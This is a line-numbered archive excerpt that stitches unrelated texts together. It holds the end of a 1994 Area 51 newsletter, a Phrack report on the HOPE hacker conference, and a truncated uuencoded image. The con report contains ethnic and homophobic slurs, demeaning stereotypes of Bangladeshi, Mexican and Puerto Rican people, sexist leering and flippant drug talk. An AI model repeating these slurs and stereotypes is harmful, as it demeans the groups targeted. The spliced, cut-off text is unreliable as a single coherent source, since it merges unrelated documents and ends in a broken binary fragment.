  16615. DOUG LAMOREAUX, being first duly sworn and under penalty of 
  16616. perjury, personally appeared before me and complained that on or 
  16617. about the 19th of July, 1994, in Lincoln County, State of Nevada, 
  16618. the above-named Defendant, GLENN P. CAMPBELL, committed the 
  16619. following crime:
  16620.  
  16621. COUNT 1
  16622.  
  16623. OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC 
  16624. 1.12.010, a MISDEMEANOR, in the following manner:
  16625.  
  16626. The Defendant did, then and there, after due notice, willfully, 
  16627. hinder, delay or obstruct a public officer in the discharge of his 
  16628. officer powers or duties.  Specifically, the Defendant did, then 
  16629. and there, after due notice, willfully hinder Sergeant Doug 
  16630. Lamoreaux in the discharge of his official duties by locking the 
  16631. doors of the vehicle which Sergeant Lamoreaux was retrieving 
  16632. certain items from and further refused to unlock the doors after 
  16633. being requested to do so by Sergeant Lamoreaux.
  16634.  
  16635. All of which is contrary to the form of Statute in such cases made 
  16636. and provided and against the peace and dignity of the State of 
  16637. Nevada.  The complainant, therefore, prays that a Warrant be 
  16638. issued for the arrest of the Defendant, if not already arrested, 
  16639. so that he may be dealt with according to law.
  16640.  
  16641.  [Signed]
  16642.  DOUG LAMOREAUX
  16643.  Sergeant
  16644.  Lincoln County Sheriff's Department
  16645.  
  16646. SUBSCRIBED and SWORN to before me
  16647. this 24th day of August, 1994
  16648. [Signed] NOLA HOLTON
  16649. NOTARY PUBLIC/JUSTICE OF THE PEACE
  16650.  
  16651.  ---
  16652.  
  16653. The only surprise in these charges is the line "and further 
  16654. refused to unlock the doors after being requested to do so by 
  16655. Sergeant Lamoreaux."  That is not how Campbell recalls the 
  16656. incident.  DR#12, published less than 12 hours after the incident, 
  16657. reported it as follows...
  16658.  
  16659.    "At this point Campbell, who had been standing on the opposite 
  16660. side of the vehicle, reached in and pushed down the door locks on 
  16661. the side that Lamoreaux was approaching.
  16662.  
  16663.    "Lamoreaux said, 'You're under arrest.'  Campbell was 
  16664. immediately handcuffed and placed in Deputy Bryant's vehicle."
  16665.  
  16666. Campbell claims that Lamoreaux said, "You're under arrest," 
  16667. IMMEDIATELY after he pushed down the door locks, with no request 
  16668. being made to unlock them.  Campbell says he has two other 
  16669. witnesses, the KNBC crew, who can verify his story.  In this case, 
  16670. where the basic recollection of facts is in conflict, it will be 
  16671. interesting to see what the second officer, Deputy Kelly Bryant, 
  16672. will say under oath.
  16673.  
  16674. However, the core of Campbell's defense rests on Constitutional 
  16675. issues.  He is guilty of obstruction only if the officer was 
  16676. indeed engaged in the "lawful" execution of his duties.  Lamoreaux 
  16677. justified his warrantless search by citing, in vague terms, a 
  16678. certain Supreme Court ruling, the name of which he could not 
  16679. recall at the time.  That ruling is apparently in the case "Ross 
  16680. vs. U.S." which allows the warrantless seizure of "contraband" 
  16681. from a vehicle when there is a danger of flight.  It is unclear at 
  16682. this point whether the video tapes of a news crew constitute 
  16683. contraband in the same manner as a shipment of marijuana or stolen 
  16684. merchandise.  Complex First Amendment issues may be invoked.  The 
  16685. case may be further complicated by the repeated offer by the TV 
  16686. reporter to allow Lamoreaux to view the video tapes himself.
  16687.  
  16688. Campbell has requested, and has been granted, a jury trial.  
  16689. According to the Justice, this will be the first jury trial held 
  16690. in this court since about 1987.  Campbell announced his intention 
  16691. to represent himself at the trial, with possible legal co-council.  
  16692. A tentative trial date of Oct. 25 has been set, but it is likely 
  16693. to be postponed.  Campbell indicated that he will waive his right 
  16694. to a trial within 60 days to allow more time to conduct legal 
  16695. research.
  16696.  
  16697.  ----- LARRY KING NOT CLONED? -----
  16698.  
  16699. Our report in DR#13 about the diversion of Larry King's plane to 
  16700. Nellis AFB continues to disturb many of our readers.  It raises 
  16701. the specter of secret contacts between King and the military or 
  16702. even a surreptitious replacement of the talk show host by a look-
  16703. alike clone.  Now, we wonder if our panic was only a false alarm.  
  16704.  
  16705. A producer from a Las Vegas TV station tells us:  "I checked into 
  16706. it and think it is legit.  According to the FAA, McCarran Airport 
  16707. was never really closed, but they did have pilots choose not to 
  16708. land on that Saturday afternoon because of inclement weather.  
  16709. They also confirm that there is an agreement with Nellis to allow 
  16710. planes in trouble to land there.  I spoke to the control tower at 
  16711. McCarran.  They checked their records, and they indicate that on 
  16712. that Saturday a nasty thunderstorm was noted by the tower at 1:45-
  16713. 2:05.  In fact, four takeoffs were delayed during that time due to 
  16714. weather.  Planes in the air just flew holding patterns until the 
  16715. weather cleared."  
  16716.  
  16717. Presumably, King's plane didn't have enough fuel to maintain the 
  16718. holding pattern.  Thunderstorms can be very localized, and perhaps 
  16719. Nellis was clear.  A producer at Larry King Live says that, in her 
  16720. opinion, he is definitely the same Larry King.  She says he got 
  16721. the military escort because he was late for a speaking engagement 
  16722. and made his wants known on the plane.  
  16723.  
  16724. So what can we say?  Obviously, the FAA, the TV station and the 
  16725. King producer ARE PARTIES TO THE CONSPIRACY.  This story is deeper 
  16726. than it seems, and the Rat will pursue the investigation for as 
  16727. long as it takes.  THE TRUTH IS OUT THERE.
  16728.  
  16729.  ----- MYSTERIOUS SIGN DISAPPEARANCE -----
  16730.  
  16731. The big "No Photography" signs on the Groom Lake Road have 
  16732. disappeared.  For over a year, they were installed on public land 
  16733. about two miles from the military border, but sometime in the 
  16734. first week of August they were cleanly removed, posts and all, 
  16735. apparently by the Air Force.  (A civilian thief--like SDM, who has 
  16736. a number of these signs in his possession--would have simply 
  16737. unscrewed the signs, not uprooted the heavy posts and carefully 
  16738. filled up the holes.)  The two signs on either side of the road 
  16739. were each about 3 feet by 4 feet and bore the following text:
  16740.  
  16741. WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.  
  16742. IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE, 
  16743. DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR 
  16744. FLYING OVER THIS INSTALLATION.  IT IS UNLAWFUL TO REPRODUCE, 
  16745. PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH, 
  16746. PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR 
  16747. EQUIPMENT AT OR FLYING OVER THIS INSTALLATION.  VIOLATION OF 
  16748. EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR 
  16749. IMPRISONMENT FOR UP TO ONE YEAR.  18 U.S. CODE SEC. 795/797 AND 
  16750. EXECUTIVE ORDER 10104.  FOR INFORMATION CONTACT:
  16751.    USAF/DOE LIAISON OFFICE
  16752.    PO BOX 98518
  16753.    LAS VEGAS, NV 89193-8518
  16754.  
  16755. The signs first appeared in May 1993 shortly after WFAA-TV from 
  16756. Dallas took video of the base from White Sides.  (When challenged 
  16757. by the Sheriff, they admitted photographing the base but managed 
  16758. to retain their tape.)  The signs were removed in Aug. 1994 
  16759. shortly after KNBC-TV from Los Angeles lost their video tape after 
  16760. NOT photographing the base.  It is unclear why the AF removed the 
  16761. signs.  Perhaps they have become a little smarter and are adopting 
  16762. a "don't ask, don't tell" policy toward photography (but we 
  16763. wouldn't want to be the ones to test that theory).  The signs 
  16764. themselves had become a tourist attraction, and no visitor could 
  16765. resist having their picture taken beside them.
  16766.  
  16767. At the same time the "No Photography" signs vanished, the 
  16768. misplaced "Restricted Area" sign also went away.  This is the 
  16769. crossed out sign seen in the NYT article, where the "stupid 
  16770. faggot" comment had later been written and then erased (DR#12,13).  
  16771. God, we'll miss that sign!  It was as illegal as hell--being on 
  16772. public land--but an old friend to us nonetheless.
  16773.  
  16774. At least now we can assure the public:  If you see a Restricted 
  16775. Area sign, it's real and they mean it.
  16776.  
  16777.  ----- INTEL BITTIES -----
  16778.  
  16779. ENCOUNTERS TRANSCRIPT.  Complete, unedited transcripts (not just 
  16780. the sound bites) of the interviews in the 7/22 Encounters show 
  16781. (DR#10) are available to Compuserve users.  Type GO ENCOUNTERS, 
  16782. and look under "Browse Libraries" and "Interview Transcripts."  
  16783. Interviews include Rep. James Bilbray (file FREED2.105), Agent X 
  16784. (FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105).  This 
  16785. is a transcript for video editing, so every "Um" and "Ah" is 
  16786. recorded.
  16787.  
  16788. NEW GUARD FACILITY.  We send our congrats to the Dudes on their 
  16789. newly constructed prefab building next to the guard house on Groom 
  16790. Lake Road (about a half mile inside the border).  Apparently, they 
  16791. are expecting more business along this part of the border and need 
  16792. a new substation.  Interested taxpayers can view the new building 
  16793. from the first hill on the hiking trail to F.R. ("Hawkeye Hill"), 
  16794. a location that will continue to be public even if F.R. is taken.
  16795.  
  16796. UPCOMING TV SEGMENTS.  UNSOLVED MYSTERIES will broadcast a show on 
  16797. UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm.  The 
  16798. broadcast will include a new interview with Bob Lazar.  THE 
  16799. CRUSADERS will broadcast a segment on UFOs, including a visit to 
  16800. F.R., on Sept. 10 or 11 (date and time vary by city).  Air date 
  16801. for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been 
  16802. confirmed, but it could be the week of Sept. 12.
  16803.  
  16804.  ===== SUBSCRIPTION AND COPYRIGHT INFO =====
  16805.  
  16806. (c) Glenn Campbell, 1994.  (psychospy@aol.com)
  16807.  
  16808. This newsletter is copyrighted and may not be reproduced without 
  16809. permission.  PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING:  For 
  16810. one year following the date of publication, you may photocopy this 
  16811. text or send or post this document electronically to anyone who 
  16812. you think might be interested, provided you do it without charge.  
  16813. You may only copy or send this document in unaltered form and in 
  16814. its entirety, not as partial excerpts (except brief quotes for 
  16815. review purposes).  After one year, no further reproduction of this 
  16816. document is allowed without permission.
  16817.  
  16818. Email subscriptions to this newsletter are available free of 
  16819. charge.  To subscribe (or unsubscribe), send a message to 
  16820. psychospy@aol.com.  Subscriptions are also available by regular 
  16821. mail for $15 per 10 issues, postpaid to anywhere in the world.
  16822.  
  16823. A catalog that includes the "Area 51 Viewer's Guide", the Groom 
  16824. Lake patch and hat and many related publications is available upon 
  16825. request by email or regular mail.
  16826.  
  16827. Back issues are available on various bulletin boards and by 
  16828. internet FTP to ftp.shell.portal.com, directory 
  16829. /pub/trader/secrecy/psychospy.  Also available by WWW to
  16830. http://alfred1.u.washington.edu:8080/~roland/rat/desert_rat_index.
  16831. html
  16832.  
  16833. Current circulation: 1440 copies sent directly to subscribers 
  16834. (plus an unknown number of postings and redistributions).
  16835.  
  16836. The mail address for Psychospy, Glenn Campbell, Secrecy Oversight 
  16837. Council, Area 51 Research Center, Groom Lake Desert Rat and 
  16838. countless other ephemeral entities is:
  16839.      HCR Box 38
  16840.      Rachel, NV 89001 USA
  16841.  
  16842. ###
  16843.                               ==Phrack Magazine==
  16844.  
  16845.                  Volume Five, Issue Forty-Six, File 22 of 28
  16846.  
  16847. ****************************************************************************
  16848.  
  16849.                                      HOPE
  16850.                                       by
  16851.                                  Erik Bloodaxe
  16852.  
  16853. I was a little apprehensive about going to HOPE.  I'd been warned for months
  16854. that "If you go to HOPE, you are going home in a body bag," and "I am
  16855. going to kick your fucking ass at hope," and "If you go, you're gonna get
  16856. shot."
  16857.  
  16858. Needless to say I found this a bit unnerving.  As big an ego as I may have,
  16859. it still does not repel hot lead projectiles.  Add this to the fact that my
  16860. best friend of 10 years was murdered by some random idiot with a pistol in
  16861. fucking pissant, Bible-thumping Waco, TX a few months back.  Waco.  And the
  16862. shooter wasn't even a Davidian, just a drugged-out 16 year-old.  If the
  16863. kids pack heat in Waco, I know they must come standard issue in New York.
  16864.  
  16865. But, hell, I've haven't missed a con in ages.  Could I actually miss
  16866. a SummerCon?  Especially the SummerCon commemorating the 10th
  16867. anniversary of 2600 Magazine?  Could I?
  16868.  
  16869. Like an idiot, I make my reservations.  Ice-9, who was stuck with a
  16870. leftover ticket on United, traded it in and we were both off to New York.
  16871.  
  16872. We arrived late Friday night.  So there we were:  The Big Apple, Metropolis,
  16873. The City that Never Sleeps.  Unfortunately, it never showers or changes
  16874. its clothes either.  Why anyone in their right mind would want to come
  16875. to New York City boggles the mind.  It sucks.  I mean, I've been damn
  16876. near everywhere in the United States, I've been to major cities in Mexico,
  16877. Canada and Europe, and New York is by far and away the worst fucking
  16878. shithole I've seen yet.  I don't know for certain, but Port au Prince
  16879. probably has more redeeming qualities.
  16880.  
  16881. I figured out within a few minutes why New Yorkers are such assholes too.
  16882. First, no one seems to be from New York exactly, merely transplants from
  16883. somewhere else.  So what has happened is that they bought into New York's
  16884. superb public relations campaign and sold off all their belongings to get
  16885. their ticket to America and the land of opportunities.  So, they find
  16886. themselves in NYC with about half a billion other broke, disillusioned
  16887. immigrants wading in their own filth, growing very pissed off at being sold
  16888. such a bill of goods.
  16889.  
  16890. It would piss me off too.  And I'm sure our cab driver that night missed his
  16891. family's ancestral thatched hut back in good old Bangladesh.  But luckily for
  16892. him crack provides a good short-term solution.  Not to mention excellent
  16893. motor skills.
  16894.  
  16895. Twenty-five near misses, and a lengthy carhorn symphony later, we managed to
  16896. arrive at the Hotel Pennsylvania intact.  The hotel, heralded in legend and
  16897. lore had seen better decades.  About the only thing it had going for it was
  16898. one of the oldest phone numbers in the city.  PEnnsylvania 6-5000.
  16899. (Ta-da-dum-dum)  I think if Glen Miller were alive today, his band members
  16900. would kick his ass if he told them they had to sleep there.
  16901.  
  16902. For a hundred dollars a night, Ice-9 and I were treated to two less than
  16903. jail-house sized beds, a tv that almost worked, and a hardwired telephone
  16904. (ie:  no modular jacks in sight.)  In addition, the entire room was stained
  16905. from floor to ceiling, and most of the wall paper by the window had peeled
  16906. halfway down.  The window itself opened to a miraculous view of the trash
  16907. 12 floors down.  We debated on throwing every single object in the room
  16908. out the window for a little excitement, but decided it might injure some of
  16909. the homeless below.
  16910.  
  16911. Anxious to get the hell out of our little cell (well, the prisons I've had
  16912. the misfortune to sleep in were in better repair) Ice-9 and I took off to
  16913. the top floor and the HOPE conference area.
  16914.  
  16915. I don't know why Emmanuel decided to call this conference "Hackers On Planet
  16916. Earth."  This conference had more right to the title "Hacking at the End
  16917. of the Universe."  Perhaps even "Hacking in the Cesspool of the Earth."
  16918. HEU was in the middle of nowhere, but it was pretty and happy.  It should have
  16919. been called HOPE.
  16920.  
  16921. In fact, as the days went on, I noticed a number of similarities between
  16922. HOPE and HEU:
  16923.  
  16924.         1.  Both heavily orchestrated by 2600 and Hack-Tic
  16925.         2.  Both had in-house networks
  16926.         3.  Both had token "fed" speakers
  16927.         4.  Both had seminars on boxing, pagers, social engineering, history,
  16928.             UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
  16929.         5.  Both drew extensive press attendees
  16930.         6.  Both charged more than any other conferences.  (HOPE 25, HEU 50)
  16931.         7.  Both had over a thousand attendees
  16932.         8.  Both used computer equipment to make photo badges
  16933.         9.  Both tried far too hard to be technical
  16934.        10.  New York used to be New Amsterdam
  16935.  
  16936. But I digress...
  16937.  
  16938. Anyway, the network room was beginning to shape up quite nicely.  Young
  16939. hacklets were already clicking away at their keyboards, oblivious to
  16940. anything else save their screens.  Why anyone would travel all the way to
  16941. New York to sit in front of a screen and type all by their lonesome
  16942. left me stymied.  Isn't that what we all do back at home?
  16943.  
  16944. The first people we ran into were Winn Schwartau and Bootleg.  I could
  16945. be wrong, but I think a large factor in Winn's showing up at HOPE was
  16946. to watch me get shot and write about it.  He told me his article would
  16947. be titled, "Cyber-Christ gets nailed to the Cross."  Bootleg, however, was
  16948. here to raise a little hell.  And goddamnit, so were we!
  16949.  
  16950. Hacker conferences have always been an excuse for people who only knew
  16951. each other over the phone and over the networks to actually meet face to
  16952. face and hang out.  Anyone who tells you "Conferences today suck, there isn't
  16953. enough technical inpho," is a clueless fuck.  You do not go to a conference
  16954. expecting to learn anything.  If you don't already know, chances are pretty
  16955. damn good that the people who do won't tell you.  You learn by doing, not by
  16956. sitting in an audience at some hacker con.  Get a beer, make some new friends,
  16957. and THEN maybe you might pick up something in casual conversation, but at
  16958. least you will have a good time getting sloshed with new people who share
  16959. common interests.  The only people who will learn something from
  16960. hacker conferences are journalists who will then go on to write even
  16961. more scathing sensationalist pieces about how hackers will destroy
  16962. your credit and eavesdrop on your phone.  Is that what we really
  16963. want?
  16964.  
  16965. Me, Ice-9, Bootleg, Bootleg's friend from Oregon, and Thomas Icom took off
  16966. to drink and see what debauchery lay waiting for us in Times Square.
  16967. (Yes, it was a very, very, very mismatched looking group.)  Icom, armed
  16968. with ever-present handheld scanner, kept a continual broadcast of NYPD's
  16969. latest exploits.
  16970.  
  16971. We ended up hanging out on the fringes of Times Square at some sidewalk
  16972. deli bullshitting about anything and everything.  A recurring topic throughout
  16973. the whole weekend was EMP and HERF weaponry.  I don't particularly know
  16974. if anyone in the underground would more excited by setting off one of these
  16975. devices, or merely being able to brag to everyone that they were in possession
  16976. of one.
  16977.  
  16978. We sat talking about the ramifications of setting off some such device on
  16979. the roof of the building we were sitting in front of.  The thought of
  16980. all the neon and electronics surrounding us simultaneously ceasing to
  16981. function and imploding at the logic gate level provided for at least an
  16982. hour of hacker masturbation material.  Bootleg reminisced about trying to
  16983. track down decommissioned military radar equipment back in the early 80's
  16984. for just such a project.  "I'm surprised it's taken this long for the
  16985. underground to get up on this stuff," he said.
  16986.  
  16987. As we headed back to the hotel, we passed by the coolest vehicle ever
  16988. seen by hacker eyes.  The 2600 van was an exact replica of a NYNEX
  16989. van, with the subtle addition of the magazines moniker instead of
  16990. NYNEX, and a ball-capped hack-type tapping away on a notebook computer,
  16991. plugged into the bell logo.  It was truly a sight to behold.  I began
  16992. to drool.  All Phrack has is a beat up, red Toyota Corolla.
  16993.  
  16994. Up in the network room those that were not deeply engrossed in hacking
  16995. the hope.net linux box were either already plowed (Hi Torquie!) or about
  16996. to be.
  16997.  
  16998. It was late, so we decided to crash.
  16999.  
  17000. Ice-9 and I managed to wake up at a reasonable hour, and took off to
  17001. see the city.  I had seen an electronics store the night before, and
  17002. had been looking for a PAL-NTSC-SECAM VCR for ages.  I found it.
  17003. New York's only saving grace (well, except the huge amount of
  17004. businesses there all screaming for security work) was cheap consumer
  17005. electronics.  For 380 bucks I got a VCR that not only converted on the
  17006. fly between any tape format, but also had a digital freeze frame
  17007. for those elusive screen captures.  I was stoked.
  17008.  
  17009. After some food, we headed back up to the conference.  The buzz was
  17010. someone had several hundred cell phones confiscated by Cellular One
  17011. reps after he off-handedly remarked that he would clone them
  17012. to a potential buyer.  I then ran into two of my friends from WAY back
  17013. in the early 80's:  Tuc and Agrajag.  Ag is an amazing guy.  Not only
  17014. was he fantastic way back then, he went on to write UNIX for Commodore,
  17015. pull stints at places like USL, and is now working with speech
  17016. recognition and wireless networking.  Yet another fine example of
  17017. those ne'er-do-well Legion of Doom guys the government always
  17018. frowned upon.  Right.
  17019.  
  17020. Later that afternoon, as I'm talking to someone in the network room, I feel
  17021. someone bump into me.  "Oh, sorry," says the person, and I go on with my
  17022. conversation.  A few seconds later, it happens again.  Same guy, same
  17023. "Oh, sorry."  When it happens a third time I shove the guy back, and
  17024. say, "Man, what the hell is your problem."  Mistake.  I look up straight
  17025. into the eyes of a guy about 7 feet tall and 2 feet wide.  Well, I'm
  17026. exaggerating but it sure seemed that way at the time.  All of a sudden
  17027. I am an extra in the Puerto Rican version of "Of Mice and Men."
  17028. "De Ratones Y Hombres"
  17029.  
  17030. The first guy was about 5 feet tall, and scurried around within an arms
  17031. reach of the big guy.  Immediately I realize that if I do ANYTHING, this
  17032. big dude is more than ready to fuck me up, so the little guy must be a
  17033. diversion.  The big guy grunts and begins to maneuver around me.
  17034. The little guy then takes his cue and begins pushing me, all the while
  17035. asking "What's your name?  What's your handle?"  I keep backing up keeping
  17036. an eye on the big guy, who is staring daggers at me.  Well, at least with
  17037. his one good eye.  His lazy eye, stared daggers at the wall, the carpet,
  17038. and a few other places.
  17039.  
  17040. Meanwhile, this little event has gathered the interest of many in the con.
  17041. People began to gather around to see Erik Bloodaxe finally get beat down.
  17042. Unfortunately for the would-be spectators, several others tried to intervene.
  17043. Tuc and a few of the other larger attendees went up to the big guy and
  17044. attempted to hold him back.  This only succeeded in him letting out a
  17045. roar-like sound as he shrugged them off and continued coming towards me.
  17046.  
  17047. Finally, I say to the little guy, who has been engaging me in what was
  17048. basically the equivalent of the mosh pit at a Barry Manilow concert,
  17049. (One fucked up guy running into people who don't want to play his game)
  17050. "I'm Chris Goggans, who the hell are you?"  To which he yells, "I'M JULIO!"
  17051.  
  17052. Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was
  17053. raided by the FBI and Secret Service some years back.  While all
  17054. his MOD brethren served jail time, Julio worked out a deal with the
  17055. prosecutors in which he sold out his friends by agreeing to provide
  17056. state's evidence against them should the cases go to court.
  17057.  
  17058. And I'm the bad guy?
  17059.  
  17060. Fuck, all I ever did was try to keep my business running free of
  17061. interruptions from disgruntled, jealous teenagers.  I never turned state's
  17062. evidence against my best friends to save my own ass.  What am I, Agent Steal?
  17063.  
  17064. At this point everyone rushed in-between us and whisked Julio and his
  17065. lazy-eyed, neandrethal boyfriend out the door.  (Notice, I can call him
  17066. all kinds of names now, because I'm back home in Austin, several thousand
  17067. miles away.)  I still have no idea who the big guy was.
  17068.  
  17069. From now on, those of you who sincerely want to kick my ass, have the
  17070. nerve to do it by yourself.  I mean, I only went as far up as green in
  17071. Tae Kwan Do, but that was far enough to learn the sacred truth, "Never
  17072. take on more than ONE person or you will get the shit kicked out of you."
  17073. Leave your boyfriends at home and be a man.  If I have the balls to
  17074. go thousands of miles away from home an enter the DMZ expecting to get
  17075. shot, then you should have the balls enough to do something on your own.
  17076. And remember:  take the first swing.
  17077.  
  17078. Shortly after "the incident" as it came to be called, by everyone who
  17079. approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele
  17080. took off to find food.  Steele decided we needed female accompaniment,
  17081. so he invited a reporter from Details.  She brought along her camera crew,
  17082. who had been taking so many pictures around the con, one would think
  17083. they owned Polaroid stock.
  17084.  
  17085. Robert Steele is an interesting character.  After a 20 year CIA tour he went
  17086. on to found Open Source Solutions, a beltway operation that uses public
  17087. sources of information to build intelligence dossiers.  He described
  17088. himself as "a short, fat, balding old-guy."  This is like Rush Limbaugh
  17089. calling himself "a harmless, loveable little fuzzball."  Their self-image
  17090. is a bit removed from reality.  Steele carries himself with the air of
  17091. a spy.  It's kind of hard to explain, but it would be easy to see Steele
  17092. excusing himself from dinner, killing three guys in the alley, and coming
  17093. back for a piece of apple pie without an accelerated heartbeat or breaking
  17094. a sweat.
  17095.  
  17096. On top of being so immersed in the spy game, and having been in charge of
  17097. the design and implementation of the CIA's data center, Steele takes the
  17098. severely radical viewpoint that hackers are America's most valuable
  17099. resource, and should be put to productive use rather than jailed.  This
  17100. man needs to come to more cons.
  17101.  
  17102. Dinner was odd to say the least.  The media people sat together, somewhat
  17103. removed from us.  They said approximately 5 words to us the whole time,
  17104. possibly feeling somewhat bored by our drunken computer revelry.
  17105. The reporter seemed visibly disturbed by all of us, and the guys
  17106. looked like they would be more comfortable sitting in a coffee shop
  17107. listening to Tom Waits while having a hearty debate over "Freud vs. Jung."
  17108.  
  17109. Our discussions got louder and louder as the scotch flowed, and
  17110. by the end of the evening most of the restaurant had heard such topics
  17111. as "The CIA does most of its recruitment in the Mormon church," and
  17112. "licking the floor at a Times Square peep show."  By the time the check
  17113. came the Details people were more than happy to pay more than their share
  17114. of the bill to get the hell out of Dodge.  A word of advice:  always
  17115. get separate checks when dining out with any of us.
  17116.  
  17117. Back in the hood, everyone was milling about waiting for the
  17118. History of 2600 panel to begin.  There was some kind of problem with
  17119. one of the displays, so people were beginning to grow restless.  Right
  17120. about then one of the best looking girls at the con wandered by.  Taking
  17121. a guess, I asked her, "Are you Morgen?"  She was.  It's almost unbelievable
  17122. that someone who would waste time hanging out on IRC and who can actually
  17123. interview for highly technical jobs could look like this.
  17124.  
  17125. Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to
  17126. get drunk, all of them rather disgusted by the regular con attendees.
  17127. They invited me, so I tracked down Ice-9, who by that time was so ready
  17128. for a pint of Guiness you could almost see the Harp Logo showing up
  17129. on his skin like drunken stigmata.
  17130.  
  17131. We ended up across the street at a little pub called the Blarney Rock.
  17132. Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots
  17133. went down like Mexican whores.  Everyone was in agreement that this
  17134. was the best time any of us had experienced  at HOPE.  In between everyone
  17135. drinking, and leering at Morgen, we actually talked about hacking stuff too.
  17136. Gee, and we weren't even on a panel!
  17137.  
  17138. As the night progressed, almost everyone from the con ended up at the Blarney
  17139. Rock.  The con took the place over.  The Blarney Rock probably made
  17140. more money that night than they had any night in recent history.
  17141. Everyone actually mingled, talked, planned and plotted.  Plans were thrown
  17142. around for the next PumpCon (Boston?), everyone talked about "the time
  17143. they were busted the first time," Steele showed up wearing a Chinese
  17144. Communist Cap, Fusion cursed at passers by in Korean and almost started
  17145. an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend's
  17146. Fallon-esque ability (much to the shock and envy of everyone listening),
  17147. Count0 told his decapitated dog story, and there was much rejoicing.  (YAY!)
  17148.  
  17149. As the night went on, Ice-9 and I decided now was the time to actually
  17150. check out the seedy underbelly of Times Square.  At 1:00 in the evening.
  17151. Alone.  Drunk.  Wide-eyed out-of-towners staggering up side streets in
  17152. one of New York City's sleaziest areas.
  17153.  
  17154. Within a few minutes of hitting 42nd and 7th, we were approached by a
  17155. street hustler.  "Yo, what you need?  Crack?  Smoke?  H?  You like young
  17156. girls?  What you need, mah man?"  Ice-9, in his drunken glory, "Yo man,
  17157. you don't know who the fuck you're dealing with!  I'm the biggest fucking
  17158. felon in the whole goddamn world.  You don't have shit that I couldn't
  17159. get, and probably don't already have."  The hustler took a double-take
  17160. and said, "Yo, I likes your style."  Ice replied, "You damn Skippy!"
  17161.  
  17162. Shortly thereafter, another hustler showed up.  "Yo man, you want crack?
  17163. I got the rock right here."  Ice looked at him and said, "Man, if I smoke
  17164. any more crack tonight, I'm going to fucking explode."  The dealer went
  17165. away fast.
  17166.  
  17167. Times Square isn't quite as sleazy as it's made out to be actually.
  17168. I've been in worse.  It does, however, have the most extensive and
  17169. cheapest collection of European smut this side of Copenhagen.  In fact,
  17170. the same movies from Holland would have cost 40 American dollars more in
  17171. Holland than they did in New York.  Beyond that, Times Square had little
  17172. to offer anyone.  That is, unless you wanted to spend a buck in a
  17173. really sleazy peep show to grope some crack whore.  I think not.
  17174.  
  17175. Somehow, we made it back to the Blarney Rock alive, only to find that they
  17176. had kicked everyone out.  We headed back to our cell and passed out.
  17177.  
  17178. The next morning, I came to early and wandered around the hotel.  The second
  17179. floor had caught on fire recently, and one wing was completely
  17180. barbecued.  All the gutted rooms were unlocked and the phones worked.
  17181. God only knows why people weren't using these rooms as squatter's pads,
  17182. considering how broke most hackers are.
  17183.  
  17184. The main ballroom in the hotel was very cool.  It was easy to see how
  17185. at one point in time the Pennsylvania was quite a sight to behold.
  17186. I suppose it was much like New York itself in that respect:  Once
  17187. a marvel of the modern world, now a festering sore crying out for
  17188. a good cleaning and some antibiotic.
  17189.  
  17190. We left New York at noon that day, and did not even get the chance to
  17191. see the numerous panels scheduled for that day.  With my complete absence
  17192. from any panel it's doubtful I would have made it anyway.
  17193.  
  17194. -----------------------------------------------------------------------------
  17195.  
  17196. So, did I like HOPE?  Yes.  I like cons for what they should be:
  17197. a chance to hang out in person with your idiot online friends.  Hackers
  17198. are an odd bunch.  We are all basically a bunch of self-involved,
  17199. egomaniacal, borderline-criminal attention-seekers.  Rarely, if ever,
  17200. can we expect to meet anyone stupid enough to share our interests.
  17201. Normal citizens, with whom most of us share absolutely no common frame
  17202. of reference, look at us as if we were Martians.  Even those
  17203. computer-literate folk who talk geekspeak and understand most of
  17204. what we are saying are left in the dark when we begin babbling
  17205. about breaking into anything.
  17206.  
  17207. Collectively, we are all fools, and without the opportunities of
  17208. any social interaction with our peers, we will all fall prey to fear,
  17209. uncertainty and doubt regarding each other.  We had the social aspect
  17210. many years ago in the early 80's with the proliferation of BBSes and
  17211. teleconferences.  Now, much of that interaction is lost.  Compared to
  17212. our subculture's "Golden Age," the teleconferences and BBSes that exist
  17213. today are a pale reflection of the ones of yesterday.  All we have is
  17214. the inane banter provided by IRC and the occasional con.
  17215.  
  17216. Our only hope is each other.
  17217.  
  17218. See you all at Summercon 1995 - Atlanta, Georgia.
  17219.  
  17220. -----------------------------------------------------------------------------
  17221.  
  17222. begin 644 2600VAN.JPG
  17223. M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
  17224. M_]L`A``%`P,$`P,%!`0$!04%!@<,"`<'!P</"PL)#!(0$Q,2$!$1%!<=&!05S
  17225. M&Q81$1DB&1L>'R`A(!,8)"8C("8=("`?`04%!0<&!P\("`\?%1$5'Q\?'Q\?4
  17226. M'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q__`
  17227. MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
  17228. M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
  17229. M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
  17230. M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
  17231. MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
  17232. MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
